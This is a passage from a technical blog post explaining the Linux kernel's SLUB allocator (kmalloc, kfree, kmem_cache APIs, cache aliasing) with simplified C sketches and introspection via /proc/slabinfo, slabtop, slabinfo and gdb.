</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">size</span> <span class="o">&gt;</span> <span class="n">KMALLOC_MAX_CACHE_SIZE</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="nf">kmalloc_large</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">__kmalloc</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div>
<p>We can see the generic <code>kmalloc()</code> definition is a wrapper around <code>__kmalloc()</code>, which is prototyped in <code>slab.h</code> but defined separately by each slab implementation.</p>
<p>The <code>kmalloc()</code> wrapper essentially hands off large allocations (defined by <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L290"><code>KMALLOC_MAX_CACHE_SIZE</code></a>) to a separate function, <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L526"><code>kmalloc_large()</code></a>, which in fact calls the underlying buddy allocator to serve large allocations!</p>
<p>Otherwise, <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L434"><code>__kmalloc()</code></a> is called, whose implementation can be found in <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L4412"><code>/mm/slub.c</code></a>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">__kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span> <span class="p">{</span> 
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="o">*</span><span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="n">s</span> <span class="o">=</span> <span class="nf">kmalloc_slab</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>         <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div>
<p>Bringing things back round to the SLUB allocator, if this is making an allocation of <code>size</code> bytes - what <code>kmem_cache</code> is it allocating from? Good question!</p>
<p>By default the kernel creates an array of general purpose <code>kmem_caches</code> depending on the &ldquo;kmalloc type&rdquo; (derived from <code>flags</code>) and the allocation <code>size</code>.</p>
<p>These caches are mainly created via <a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L875"><code>create_kmalloc_caches()</code></a> and stored in the exported symbol <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339"><code>kmalloc_caches</code></a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">extern</span> <span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="n">kmalloc_caches</span><span class="p">[</span><span class="n">NR_KMALLOC_TYPES</span><span class="p">][</span><span class="n">KMALLOC_SHIFT_HIGH</span> <span class="o">+</span> <span class="mi">1</span><span class="p">];</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339">/include/linux/slab.h</a></p>
<p>So to answer our question: <code>kmalloc()</code> will determine which <code>kmem_cache</code> to allocate from by using the <code>flags</code> and <code>size</code> arguments to index into <code>kmalloc_caches</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">kmalloc_caches</span><span class="p">[</span><span class="nf">kmalloc_type</span><span class="p">(</span><span class="n">flags</span><span class="p">)][</span><span class="n">index</span><span class="p">];</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L737">/mm/slab_common.c</a></p>
<p>The <code>index</code> above is derived from <code>size</code>. The general purpose cache size-to-index mapping can be seen via the <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L386"><code>__kmalloc_index()</code></a> definition.</p>
<p>This tells us the size of the objects in each <code>kmem_cache</code>, e.g. the <code>kmem_cache</code> for 256 byte objects will be at <code>index</code> 8.</p>
<p>Note that a <code>kmalloc()</code> allocation will use the smallest <code>kmem_cache</code> object size it can fit into. E.g. a 257 byte allocation won&rsquo;t fit into the 256 byte objects, so it will allocate from the next cache after, which is 512 byte objects.</p>
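<p>As a sanity check on the two examples above, here&rsquo;s a simplified userspace take on the size-to-index mapping. It&rsquo;s a sketch rather than a copy of <code>__kmalloc_index()</code>: the <code>toy_*</code> names are mine, and it assumes a minimum object size of 8 bytes plus the two odd-sized caches (96 and 192 bytes) at indices 1 and 2.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;stddef.h&gt;

/*
 * Simplified size-to-index mapping for cache-sized requests, assuming a
 * minimum object size of 8 bytes and odd-sized caches for 96 and 192 bytes.
 */
unsigned int toy_kmalloc_index(size_t size)
{
	unsigned int index = 3;		/* 2^3 = 8 bytes, the smallest cache here */

	if (size == 0)
		return 0;
	if (size &gt; 64 &amp;&amp; size &lt;= 96)
		return 1;		/* the 96 byte cache */
	if (size &gt; 128 &amp;&amp; size &lt;= 192)
		return 2;		/* the 192 byte cache */
	/* Otherwise pick the smallest power of two that fits the request. */
	while (((size_t)1 &lt;&lt; index) &lt; size)
		index++;
	return index;
}

/* Object size of the cache at a given index. */
size_t toy_cache_size(unsigned int index)
{
	if (index == 0)
		return 0;
	if (index == 1)
		return 96;
	if (index == 2)
		return 192;
	return (size_t)1 &lt;&lt; index;
}
</code></pre></div>
<p>Here <code>toy_kmalloc_index(256)</code> is 8, while <code>toy_kmalloc_index(257)</code> is 9 and <code>toy_cache_size(9)</code> is 512, matching the 257 byte example.</p>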
<p><img src="https://sam4k.com/content/images/2022/11/if_that-makes_sense.gif" alt=""></p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">kfree</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">objp</span><span class="p">)</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L188">/include/linux/slab.h</a></p>
<p>Before you go throwing <code>kmalloc()</code>&rsquo;s left and right, don&rsquo;t forget <code>kfree()</code>! This is of course the ubiquitous function for freeing memory allocated via the slab allocator.</p>
<p>Calling this function on an object allocated via the slab allocator will free that object. If its slab was in the <code>full</code> list, the slab becomes <code>partial</code>, and if this was the last allocated object in the slab then the slab may get released altogether.</p>
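<p>Those transitions can be sketched with nothing more than the two counters from <code>struct slab</code>. This is a toy model with made-up names, and the release rule (only let go of an empty slab once the node already holds at least <code>min_partial</code> partial slabs) is my simplified reading of how <code>min_partial</code> is used, not a copy of the kernel logic.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;stdbool.h&gt;

/* Hypothetical slab states, following the lists described in this post. */
enum toy_slab_state { TOY_EMPTY, TOY_PARTIAL, TOY_FULL };

struct toy_slab_counts {
	unsigned int objects;	/* total objects in the slab */
	unsigned int inuse;	/* objects currently allocated */
};

/* Classify a slab purely from its counters. */
enum toy_slab_state toy_state(const struct toy_slab_counts *s)
{
	if (s-&gt;inuse == 0)
		return TOY_EMPTY;
	if (s-&gt;inuse == s-&gt;objects)
		return TOY_FULL;
	return TOY_PARTIAL;
}

/* Free one object and report which state the slab ends up in. */
enum toy_slab_state toy_free_one(struct toy_slab_counts *s)
{
	if (s-&gt;inuse &gt; 0)
		s-&gt;inuse--;
	return toy_state(s);
}

/* Assumed rule: release an empty slab only if enough partial slabs remain. */
bool toy_should_release(enum toy_slab_state state, unsigned long nr_partial,
			unsigned long min_partial)
{
	return state == TOY_EMPTY &amp;&amp; nr_partial &gt;= min_partial;
}
</code></pre></div>
<p>Freeing one object from a full 32-object slab leaves it <code>TOY_PARTIAL</code>; freeing the only remaining object leaves it <code>TOY_EMPTY</code>, at which point it becomes a candidate for release.</p>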
<h4 id="kmemcachecreate">kmem_cache_create</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="nf">kmem_cache_create</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">align</span><span class="p">,</span> <span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">ctor</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">));</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L150">/include/linux/slab.h</a></p>
<p>So we&rsquo;ve covered the fundamentals: allocating and freeing via the slab allocator. <code>kmem_cache_create()</code> allows kernel developers to create their own <code>kmem_cache</code> within the slab allocator - pretty neat, right?</p>
<p>Creating a special-purpose cache can be advantageous, especially for objects which are allocated often (like <code>struct task_struct</code>):</p>
<ul>
<li>We can reduce internal fragmentation by specifying the object size to suit our needs, as the general purpose caches have fixed object sizes which may not be optimal</li>
<li><code>ctor()</code> allows us to optimise initialisation of our objects if values are being reused</li>
<li>There&rsquo;s also debugging, security and other benefits to this but you get the gist!</li>
</ul>
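<p>To put a number on the fragmentation point, here&rsquo;s a quick sketch that works out how many bytes per object are wasted when a request lands in a general purpose cache. The helper names are hypothetical, and for simplicity it assumes power-of-two cache sizes starting at 8 bytes, ignoring the 96 and 192 byte caches.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;stddef.h&gt;

/* Round up to the next power of two, ignoring the 96 and 192 byte caches. */
size_t toy_general_cache_size(size_t size)
{
	size_t cache = 8;	/* assumed smallest general purpose cache */

	while (cache &lt; size)
		cache &lt;&lt;= 1;
	return cache;
}

/* Bytes wasted per object when `size` bytes come from a general purpose cache. */
size_t toy_wasted_bytes(size_t size)
{
	return toy_general_cache_size(size) - size;
}
</code></pre></div>
<p>A 600 byte object would be served from a 1024 byte cache, so <code>toy_wasted_bytes(600)</code> is 424. A dedicated cache sized for that object avoids most of that slack.</p>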
<p>We can actually use Elixir to <a href="https://elixir.bootlin.com/linux/v6.0.6/A/ident/kmem_cache_create">see all the references</a> to <code>kmem_cache_create()</code> in the kernel and find out who&rsquo;s making use of this too!</p>
<h4 id="kmemcachealloc">kmem_cache_alloc</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">kmem_cache_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span> <span class="n">__assume_slab_alignment</span> <span class="n">__malloc</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L435">/include/linux/slab.h</a></p>
<p>Once we&rsquo;ve created a <code>kmem_cache</code>, we can use <code>kmem_cache_alloc()</code> to allocate an object directly from that cache. You&rsquo;ll notice here we don&rsquo;t supply a <code>size</code>, as caches have fixed sized objects and we&rsquo;re specifying directly the cache we want to allocate from!</p>
<h4 id="cache-aliases">cache aliases</h4>
<p>Something I haven&rsquo;t mentioned up until now, is the concept of SLUB aliasing.</p>
<p>To reduce fragmentation, the kernel may &ldquo;merge&rdquo; caches with similar properties (alignment, size, flags etc.). <code>find_mergeable()</code> implements this mergeability check:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="nf">find_mergeable</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">size</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="n">align</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">ctor</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">));</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L291">/mm/slab.h</a></p>
<p>A special-purpose cache may get merged/aliased with one of the general-purpose caches we touched on earlier, so allocations via <code>kmem_cache_alloc()</code> for a merged cache will actually come from the respective general-purpose cache.</p>
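<p>To give a feel for what &ldquo;similar properties&rdquo; might mean in practice, here&rsquo;s a cut-down sketch of a mergeability check. It&rsquo;s only loosely modelled on the kind of tests <code>find_mergeable()</code> performs; the struct, the function name and the exact rules (no constructors, matching flags, a compatible alignment, less than a pointer&rsquo;s worth of wasted space) are assumptions for illustration.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;

/* Hypothetical, cut-down description of a cache for the purposes of merging. */
struct toy_cache_desc {
	size_t size;		/* object size in bytes */
	size_t align;		/* required alignment, a non-zero power of two */
	unsigned int flags;	/* cache flags that must match to merge */
	bool has_ctor;		/* caches with a constructor are left alone */
};

/* Could a new cache described by `want` be aliased onto `existing`? */
bool toy_can_merge(const struct toy_cache_desc *want,
		   const struct toy_cache_desc *existing)
{
	if (want-&gt;has_ctor || existing-&gt;has_ctor)
		return false;
	if (want-&gt;flags != existing-&gt;flags)
		return false;
	if (want-&gt;size &gt; existing-&gt;size)
		return false;		/* objects would not fit */
	if (existing-&gt;size % want-&gt;align != 0)
		return false;		/* alignment would be broken */
	/* Only merge when little space is wasted per object. */
	return existing-&gt;size - want-&gt;size &lt; sizeof(void *);
}
</code></pre></div>
<p>Under these assumed rules a constructor-less 254 byte cache with matching flags could be aliased onto a 256 byte cache, whereas a 200 byte one would waste too much space per object and stay separate.</p>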
<hr>
<ol>
<li><a href="https://man7.org/linux/man-pages/man3/errno.3.html">https://man7.org/linux/man-pages/man3/errno.3.html</a></li>
</ol>
<h3 id="seeing-it-in-action">Seeing It In Action</h3>
<p><img src="https://sam4k.com/content/images/2022/11/roll_up_my_sleeves.gif" alt=""></p>
<p>This is where things get fun! In this section we&rsquo;re gonna take what we&rsquo;ve learned throughout this post and double check I haven&rsquo;t been making it all up :D</p>
<h4 id="procslabinfo">/proc/slabinfo</h4>
<p>Our good ol&rsquo; friend <a href="https://man7.org/linux/man-pages/man5/proc.5.html"><code>procfs</code></a> is coming in strong again with <a href="https://man7.org/linux/man-pages/man5/slabinfo.5.html"><code>/proc/slabinfo</code></a>, which provides kernel slab allocator statistics to privileged users.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ sudo cat /proc/slabinfo
</span></span><span class="line"><span class="cl">slabinfo - version: 2.1
</span></span><span class="line"><span class="cl"># name            &lt;active_objs&gt; &lt;num_objs&gt; &lt;objsize&gt; &lt;objperslab&gt; &lt;pagesperslab&gt; : tunables &lt;limit&gt; &lt;batchcount&gt; &lt;sharedfactor&gt; : slabdata &lt;active_slabs&gt; &lt;num_slabs&gt; &lt;sharedavail&gt;
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">task_struct         1480   1539   8384    3    8 : tunables    0    0    0 : slabdata    513    513      0
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">dma-kmalloc-512        0      0    512   32    4 : tunables    0    0    0 : slabdata      0      0      0
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">kmalloc-cg-512      1169   1312    512   32    4 : tunables    0    0    0 : slabdata     41     41      0
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">kmalloc-512        40878  43360    512   32    4 : tunables    0    0    0 : slabdata   1355   1355      0
</span></span><span class="line"><span class="cl">kmalloc-256        21850  21856    256   32    2 : tunables    0    0    0 : slabdata    683    683      0
</span></span><span class="line"><span class="cl">kmalloc-192        35987  37002    192   21    1 : tunables    0    0    0 : slabdata   1762   1762      0
</span></span><span class="line"><span class="cl">kmalloc-128         4555   5440    128   32    1 : tunables    0    0    0 : slabdata    170    170      0
</span></span></code></pre></div><p>snippet from <code>$ sudo cat /proc/slabinfo</code></p>
<p>This provides some useful information on the various caches on the system. From the snippet above we can see some of the stuff we touched on in the API section!</p>
<p>We can see a private cache, used for <code>struct task_struct</code>, named <code>task_struct</code>. Additionally we can see several general purpose caches, of various kmalloc types (<code>KMALLOC_DMA</code>, <code>KMALLOC_CGROUP</code> and <code>KMALLOC_NORMAL</code> respectively) and sizes.</p>
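<p>If you fancy poking at these numbers programmatically, here&rsquo;s a small sketch that parses the leading columns of a <code>/proc/slabinfo</code> data line and works out how much of each slab is left over after packing in the objects. The struct and function names are made up, and the 4 KiB page size is an assumption.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c">#include &lt;stdio.h&gt;

/* The per-cache columns of /proc/slabinfo that precede the tunables. */
struct toy_slabinfo {
	char name[64];
	unsigned long active_objs;
	unsigned long num_objs;
	unsigned long objsize;
	unsigned long objperslab;
	unsigned long pagesperslab;
};

/* Parse one data line of /proc/slabinfo; returns 0 on success, -1 otherwise. */
int toy_parse_slabinfo(const char *line, struct toy_slabinfo *out)
{
	int n = sscanf(line, "%63s %lu %lu %lu %lu %lu",
		       out-&gt;name, &amp;out-&gt;active_objs, &amp;out-&gt;num_objs,
		       &amp;out-&gt;objsize, &amp;out-&gt;objperslab, &amp;out-&gt;pagesperslab);

	return n == 6 ? 0 : -1;
}

/* Bytes of each slab not covered by objects, assuming 4 KiB pages. */
unsigned long toy_slab_slack(const struct toy_slabinfo *si)
{
	return si-&gt;pagesperslab * 4096UL - si-&gt;objperslab * si-&gt;objsize;
}
</code></pre></div>
<p>Feeding it the <code>kmalloc-192</code> line from the snippet gives a slack of 64 bytes per slab (21 objects of 192 bytes in one page), while <code>kmalloc-512</code> packs its four pages exactly and <code>task_struct</code> leaves 7616 bytes of its eight pages unused by objects.</p>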
<h4 id="slabtop">slabtop</h4>
<p><a href="https://man7.org/linux/man-pages/man1/slabtop.1.html"><code>slabtop</code></a> is a neat little tool, and part of the /proc filesystem utilities project, which takes the introspection a step further by providing realtime slab cache information!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> Active / Total Objects (% used)    : 3479009 / 3524760 (98.7%)
</span></span><span class="line"><span class="cl"> Active / Total Slabs (% used)      : 100682 / 100682 (100.0%)
</span></span><span class="line"><span class="cl"> Active / Total Caches (% used)     : 130 / 181 (71.8%)
</span></span><span class="line"><span class="cl"> Active / Total Size (% used)       : 923525.41K / 936501.10K (98.6%)
</span></span><span class="line"><span class="cl"> Minimum / Average / Maximum Object : 0.01K / 0.27K / 295.07K
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME                   
</span></span><span class="line"><span class="cl"> 766116 766116 100%    0.10K  19644       39     78576K buffer_head
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl"> 43328  40468  93%    0.50K   1354       32     21664K kmalloc-512
</span></span><span class="line"><span class="cl"> 36981  35834  96%    0.19K   1761       21      7044K kmalloc-192
</span></span></code></pre></div><p>snippet from <code>$ sudo slabtop</code></p>
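<p>As a quick sanity check on how those columns relate, here&rsquo;s a small sketch using only the numbers from the snippet above: <code>SLABS * OBJ/SLAB</code> should give <code>OBJS</code>, and <code>CACHE SIZE / SLABS</code> gives the size of a single slab. The variable names are mine, nothing here comes from <code>slabtop</code> itself.</p>

```python
rows = [
    # (name, objs, slabs, objs_per_slab, cache_size_kib), copied from the slabtop snippet
    ("buffer_head", 766116, 19644, 39, 78576),
    ("kmalloc-512", 43328, 1354, 32, 21664),
    ("kmalloc-192", 36981, 1761, 21, 7044),
]

slab_kib = {}
for name, objs, slabs, per_slab, cache_kib in rows:
    # Every slab holds the same number of objects, so these must agree.
    assert slabs * per_slab == objs
    # Size of one slab in KiB, derived from the total cache size.
    slab_kib[name] = cache_kib // slabs

print(slab_kib)
```

<p>The <code>kmalloc-512</code> slabs come out larger than a single 4K page, which lines up with 32 objects of 512 bytes each.</p>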
<h4 id="slabinfo">slabinfo</h4>
<p>Perhaps confusingly, there is also a tool named <code>slabinfo</code> which is provided with the kernel source in <code>tools/vm/slabinfo.c</code> (calling <code>make</code> in <code>tools/vm</code> is all you need to do to build this and get stuck in).</p>
<p>To further the confusion, instead of <code>/proc/slabinfo</code>, <code>slabinfo</code> uses <code>/sys/kernel/slab/</code><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">[1]</a> as its source of information. It contains a snapshot of the internal state of the slab allocator which can be processed by <code>slabinfo</code>.</p>
<p>Further to our section on cache aliases earlier, we can use <code>slabinfo -a</code> to see a list of all the current cache aliases on our system!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ ./slabinfo -a
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">:0000256     &lt;- key_jar 
</span></span></code></pre></div><p>Here we can see the <code>kmem_cache</code> with name <code>&quot;key_jar&quot;</code> is aliased with <code>kmalloc-256</code>.</p>
<h4 id="debugging">debugging</h4>
<p><img src="https://sam4k.com/content/images/2022/11/headband_prepare.gif" alt=""></p>
<p>Sometimes you just can&rsquo;t beat getting stuck into some good ol&rsquo; kernel debugging. I&rsquo;ve covered previously how to get this set up<a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">[2]</a>; it&rsquo;s fairly quick to get kernel debugging via <code>gdb</code> up and running on a QEMU/VMware guest, I promise!</p>
<p>After that we can explore to our heart&rsquo;s content. We can unravel the exported list <code>slab_caches</code> directly, or perhaps break on a call to <code>kmalloc()</code> and see what hits first.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gef➤  b __kmalloc
</span></span><span class="line"><span class="cl">Breakpoint 2 at 0xffffffff81347240: file mm/slub.c, line 4391.
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">──────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
</span></span><span class="line"><span class="cl">[#0] 0xffffffff81347240 → __kmalloc(size=0x108, flags=0xdc0)
</span></span><span class="line"><span class="cl">[#1] 0xffffffff81c4911c → kmalloc(flags=0xdc0, size=0x108)
</span></span><span class="line"><span class="cl">[#2] 0xffffffff81c4911c → kzalloc(flags=0xcc0, size=0x108)
</span></span><span class="line"><span class="cl">[#3] 0xffffffff81c4911c → fib6_info_alloc(gfp_flags=0xcc0, with_fib6_nh=0x1)
</span></span><span class="line"><span class="cl">[#4] 0xffffffff81c44186 → ip6_route_info_create(cfg=0xffffc900007a7a58, gfp_flags=0xcc0, extack=0xffffc900007a7bb0)
</span></span></code></pre></div><p>Given I&rsquo;m ssh&rsquo;d into my guest, it&rsquo;s probably unsurprising there&rsquo;s network stuff kicking about. Looks like someone&rsquo;s requested a 0x108 byte object, and as we&rsquo;re going through <code>kmalloc()</code> this should end up in one of the general purpose caches.</p>
<p>0x108 is 264 bytes, so that&rsquo;s just too big for the <code>kmalloc-256</code> cache, so we should expect an allocation from one of the 512 byte general purpose caches, right? Let&rsquo;s find out!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">__kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="n">s</span> <span class="o">=</span> <span class="nf">kmalloc_slab</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span></code></pre></div><p>Looking at the source, we can see the call to <code>kmalloc_slab()</code> will return our cache.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gef➤  disas 
</span></span><span class="line"><span class="cl">Dump of assembler code for function __kmalloc:
</span></span><span class="line"><span class="cl">=&gt; 0xffffffff81347240 &lt;+0&gt;:     nop    DWORD PTR [rax+rax*1+0x0]
</span></span><span class="line"><span class="cl">   0xffffffff81347245 &lt;+5&gt;:     push   rbp
</span></span><span class="line"><span class="cl">   0xffffffff81347246 &lt;+6&gt;:     mov    rbp,rsp
</span></span><span class="line"><span class="cl">   0xffffffff81347249 &lt;+9&gt;:     push   r15
</span></span><span class="line"><span class="cl">   0xffffffff8134724b &lt;+11&gt;:    push   r14
</span></span><span class="line"><span class="cl">   0xffffffff8134724d &lt;+13&gt;:    mov    r14d,esi
</span></span><span class="line"><span class="cl">   0xffffffff81347250 &lt;+16&gt;:    push   r13
</span></span><span class="line"><span class="cl">   0xffffffff81347252 &lt;+18&gt;:    push   r12
</span></span><span class="line"><span class="cl">   0xffffffff81347254 &lt;+20&gt;:    push   rbx
</span></span><span class="line"><span class="cl">   0xffffffff81347255 &lt;+21&gt;:    sub    rsp,0x18
</span></span><span class="line"><span class="cl">   0xffffffff81347259 &lt;+25&gt;:    mov    QWORD PTR [rbp-0x40],rdi
</span></span><span class="line"><span class="cl">   0xffffffff8134725d &lt;+29&gt;:    mov    rax,QWORD PTR gs:0x28
</span></span><span class="line"><span class="cl">   0xffffffff81347266 &lt;+38&gt;:    mov    QWORD PTR [rbp-0x30],rax
</span></span><span class="line"><span class="cl">   0xffffffff8134726a &lt;+42&gt;:    xor    eax,eax
</span></span><span class="line"><span class="cl">   0xffffffff8134726c &lt;+44&gt;:    cmp    rdi,0x2000
</span></span><span class="line"><span class="cl">   0xffffffff81347273 &lt;+51&gt;:    ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
</span></span><span class="line"><span class="cl">   0xffffffff81347279 &lt;+57&gt;:    mov    rdi,QWORD PTR [rbp-0x40]
</span></span><span class="line"><span class="cl">   0xffffffff8134727d &lt;+61&gt;:    call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
</span></span><span class="line"><span class="cl">   0xffffffff81347282 &lt;+66&gt;:    mov    r12,rax
</span></span><span class="line"><span class="cl">   ...
</span></span></code></pre></div><p>Okay, nice, we can see the call to <code>kmalloc_slab()</code> on line 20 of the listing (at <code>__kmalloc+61</code>), so we just need to check the return value after that <code>call</code> :) Cos we&rsquo;re on <code>x86_64</code> we know it&rsquo;ll be in <code>$RAX</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">───────────────────────────────────────────────────────────────────────────── registers ────
</span></span><span class="line"><span class="cl">$rax   : 0xffff888100041a00  →  0x0000000000035140  →  0x0000000000035140
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">─────────────────────────────────────────────────────────────────────────── code:x86:64 ────
</span></span><span class="line"><span class="cl">   0xffffffff81347273 &lt;__kmalloc+51&gt;   ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
</span></span><span class="line"><span class="cl">   0xffffffff81347279 &lt;__kmalloc+57&gt;   mov    rdi, QWORD PTR [rbp-0x40]
</span></span><span class="line"><span class="cl">   0xffffffff8134727d &lt;__kmalloc+61&gt;   call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
</span></span><span class="line"><span class="cl"> → 0xffffffff81347282 &lt;__kmalloc+66&gt;   mov    r12, rax
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">───────────────────────────────────────────────────────────────────────────────── trace ────
</span></span><span class="line"><span class="cl">[#0] 0xffffffff81347282 → __kmalloc(size=0x108, flags=0xdc0)
</span></span><span class="line"><span class="cl">────────────────────────────────────────────────────────────────────────────────────────────
</span></span><span class="line"><span class="cl">gef➤  p *(struct kmem_cache*)$rax
</span></span><span class="line"><span class="cl">$6 = {
</span></span><span class="line"><span class="cl">  ...
</span></span><span class="line"><span class="cl">  size = 0x200,
</span></span><span class="line"><span class="cl">  object_size = 0x200,
</span></span><span class="line"><span class="cl">  ...
</span></span><span class="line"><span class="cl">  ctor = 0x0 &lt;fixed_percpu_data&gt;,
</span></span><span class="line"><span class="cl">  inuse = 0x200,
</span></span><span class="line"><span class="cl">  ...
